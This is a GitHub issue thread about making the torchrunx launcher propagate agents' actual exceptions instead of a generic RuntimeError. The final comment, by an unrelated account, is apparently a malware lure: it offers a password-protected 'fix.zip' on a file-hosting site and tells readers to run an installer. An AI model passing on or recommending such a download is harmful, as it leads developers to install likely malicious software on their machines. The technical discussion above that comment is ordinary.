### ISSUE TITLE
Propagate exceptions

### ISSUE THREAD

**Issue by apoorvkh** [apoorvkh/torchrunx#59]
Currently, the Launcher process just raises a `RuntimeError` if any agents fail. I think it could be more useful to raise the actual exception from the agents. Then the user can have more conditional control at the launcher level (e.g. what to do next if there is an `OutOfMemoryError` vs something else).

The only problem might be if multiple agents fail: then which exception do we raise?

https://github.com/apoorvkh/torchrunx/blob/f081a00543bebe469ddae8a942a0930a45d2fe1a/src/torchrunx/launcher.py#L241-L253

**Comment by apoorvkh** [comment]
https://pytorch.org/docs/stable/elastic/errors.html

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
